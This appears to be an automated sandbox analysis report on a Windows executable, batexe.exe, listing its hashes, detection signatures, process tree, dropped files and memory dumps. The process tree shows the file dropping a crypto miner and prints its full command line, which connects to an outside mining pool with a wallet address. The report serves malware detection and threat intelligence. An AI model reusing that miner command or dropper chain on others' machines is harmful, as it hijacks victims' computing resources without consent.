73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
297s
max time network
307s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
21-02-2024 11:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
5028	b2e.exe
3576	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
3576	cpuminer-sse2.exe
3576	cpuminer-sse2.exe
3576	cpuminer-sse2.exe
3576	cpuminer-sse2.exe
3576	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4236-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4236 wrote to memory of 5028	4236	batexe.exe	75
PID 4236 wrote to memory of 5028	4236	batexe.exe	75
PID 4236 wrote to memory of 5028	4236	batexe.exe	75
PID 5028 wrote to memory of 660	5028	b2e.exe	76
PID 5028 wrote to memory of 660	5028	b2e.exe	76
PID 5028 wrote to memory of 660	5028	b2e.exe	76
PID 660 wrote to memory of 3576	660	cmd.exe	79
PID 660 wrote to memory of 3576	660	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4236
- C:\Users\Admin\AppData\Local\Temp\D49.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\D49.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\D49.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1410.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:660
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3576

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1410.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\D49.tmp\b2e.exe

Filesize
2.7MB

MD5
842283c15f19f463c262afbf8e34ff7e

SHA1
7fca966b9620c9f778c6fc7851c1319a370c61fa

SHA256
288274403a537397a7f005d87fd57bd442fc15105de1d7c6f11f08628ce0ab2a

SHA512
f750bad747acc1ff19cc69137035da65db38fc7330eba19988b928cb21aebdc81a9529c2669bc762a96a3972de64cf9c2c0163b542b4f42a42bc818a7c003c42

Download Submit
C:\Users\Admin\AppData\Local\Temp\D49.tmp\b2e.exe

Filesize
1.5MB

MD5
406ba57fa2dfad1d71094ed133e7304b

SHA1
2194242beca2b315936e97220d13250839c094a6

SHA256
cf46441a0d93c079e8698b9d92d3e46db4f5d0351b0d4b79e59eb22c86b7e8a8

SHA512
5ca2999b064f440285932f8581a782142be3641eb0296334d8ebb50a65c14f9528602ce768058c1e1c8fb29ffc8686d2722f92839683163aef1de7b06a5ce1c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.0MB

MD5
bc3bc3ca0bf879557901a5ef086c9efe

SHA1
0ddb1fe3287986bfb0d02e52a74db66eb3de96ed

SHA256
3f6c3d9cde4d7e27ad03ea73f569feda30c038279dfaf55acbf49007ccc9b6ae

SHA512
eb381bf67254a2915e21f04f6ad09bd6249e0d11dd556d22a401a7f27ad966a74271750a3a162bbe61b9fc9985d8275580151c8160e9360c62fe89c808b4f1ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
561KB

MD5
e67c6989e598b988162fb5a42cf684b3

SHA1
e2a448d1613eb2ff940ce37d2f42d6816399e850

SHA256
4518cf4cfdfd12ceb86146240a1cf9949c66186d46bdc7b93e6e7951c1bb7d3c

SHA512
75bf881531c2fe4b0331edc80da5759b65823a689c8b40dc8ede4e35a7eb4bb759347209b16e892fd90dbb6882f62399dc9ffea16d3533ef5efdcad00d365a5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
2f988024570cbf7de2e59250f1d26a55

SHA1
1c3499c71d85115e0bc9d1dfeb844a7d2887ce83

SHA256
20494d8802c76bb618bfd320085af4004cdcc3f45a26279e070b4261700c6777

SHA512
57c66101af40ad2eb5bfcb99b2a375d0a78358f64e3a345e53bdab9fc4cba155d80ad4933a53ededeaf921bb6112ee6ec11eee76198cf4cf8d96648311044af5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
768KB

MD5
e2f1e0de408e56e428e9be0f15ba33fa

SHA1
8068e4d2f532c5bc0d717b541fbe67e0cb7deaa2

SHA256
1e565d8d644a7f79b486c6cc1a99b1c424e25bf74c204bf1067fc1efadc76fd5

SHA512
3b76dbd0b85117f02c58679b483b4299d82c89813f103512495b7c7b4d5df785bc3c067ac201e265f40ef2625da1ea7cf9db408bfcad7c03adb396eb523b839f

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.2MB

MD5
2a4f9fc9bf55e5d3f9aa6fad21b2da5d

SHA1
7fbdc108e10c391194ab164ee374450c68c65ea5

SHA256
afadd017f6beb8314c2cc03c90e615ee9510e5f6592f42b15175038f84658c19

SHA512
934b8ddb1e16d7d17077b1d878b9670a77442c1fb403701b312f002504084c0da1c526b875dd92f1cc6c19a6eab036e29d016e859f9c4e9bf88f58b54d3d6ae1

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
912KB

MD5
51eb519466d50c05947a2e9f221d873b

SHA1
43cfe8a877eb95d9cbb5f69537ece7e97da159f1

SHA256
c4d6ded7861e4c29eccc62b41b697d05d2426f931780de8c0a4def74d08fd2a8

SHA512
696e68bf1a1331151820a01e9ca673c6f1831fab0a622f07d5cf62865bbc9419e31b122c4081170f726664f7dd945267867c09f50de30220dede992d32d9c0c5

Download Submit
memory/3576-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3576-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3576-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3576-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/3576-43-0x0000000070ED0000-0x0000000070F68000-memory.dmp

Filesize
608KB

Download
memory/3576-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/3576-44-0x0000000001110000-0x00000000029C5000-memory.dmp

Filesize
24.7MB

Download
memory/3576-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3576-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3576-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3576-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3576-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3576-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3576-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3576-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4236-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5028-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5028-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download